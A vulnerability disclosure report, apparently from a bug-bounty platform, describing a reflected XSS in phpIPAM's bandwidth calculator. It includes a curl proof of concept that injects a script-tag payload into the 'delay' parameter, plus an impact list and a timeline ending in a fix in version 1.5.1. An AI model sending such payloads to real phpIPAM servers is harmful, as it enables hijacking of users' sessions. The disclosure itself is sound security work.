Cross Site Scripting (XSS) Reflected in phpipam/phpipam

Valid

Reported on

Nov 1st 2022


Description

Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.

Proof of Concept

1. i open this page localhost/phpipam/index.php?page=tools&section=ip-calculator&subnetId=bw-calculator
2. and i analysis code line 41-45 https://github.com/phpipam/phpipam/blob/master/app/tools/ip-calculator/bw-calculator-result.php
3. next i tried with burpsuite to intercept and then change the value of some parameters such as wsize, delay and fsize on line 13-15 https://github.com/phpipam/phpipam/blob/master/app/tools/ip-calculator/ bw-calculator-result.php with <script>alert(1)</script> payload
4. and i trigger payload xss reflected <script>alert(1)</script>
//PoC
curl -i -s -k -X $'POST' \
    -H $'Host: 192.168.1.15' -H $'Content-Length: 54' -H $'Accept: */*' -H $'X-Requested-With: XMLHttpRequest' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Origin: http://192.168.1.15' -H $'Referer: http://192.168.1.15/phpipam/index.php?page=tools&section=ip-calculator&subnetId=bw-calculator' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9,id;q=0.8' -H $'Connection: close' \
    -b $'sectionSubnets.bs.table.searchText=; table-page-size=50; phpipam=p4jub8nb4ou2a95kso4ed22aom' \
    --data-binary $'wsize=50000&delay=<script>alert(1)</script>&fsize=1024' \
    $'http://192.168.1.15/phpipam/app/tools/ip-calculator/bw-calculator-result.php'

Impact

If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:

  • Perform any action within the application that the user can perform.
  • View any information that the user is able to view.
  • Modify any information that the user is able to modify.
  • Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.
We are processing your report and will contact the phpipam team within 24 hours. a year ago
ZenalArifin modified the report
a year ago
ZenalArifin modified the report
a year ago
We have contacted a member of the phpipam team and are waiting to hear back a year ago
We have sent a follow up to the phpipam team. We will try again in 4 days. a year ago
We have sent a second follow up to the phpipam team. We will try again in 7 days. a year ago
We have sent a third follow up to the phpipam team. We will try again in 14 days. a year ago
garyallan validated this vulnerability a year ago

Thanks for reporting

z3n70 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
garyallan marked this as fixed in 1.5.1 with commit 94ec73 a year ago
garyallan has been awarded the fix bounty
ZenalArifin
a year ago

Researcher


thanks @garyallan for my first CVE <3

ZenalArifin
a year ago

Researcher


hello @garyallan any update ?

ZenalArifin
a year ago

Researcher


Hello. The CVE for this Vulnerability hast Not Bern published. When will you publish IT ?

This vulnerability has now been published a year ago
to join this conversation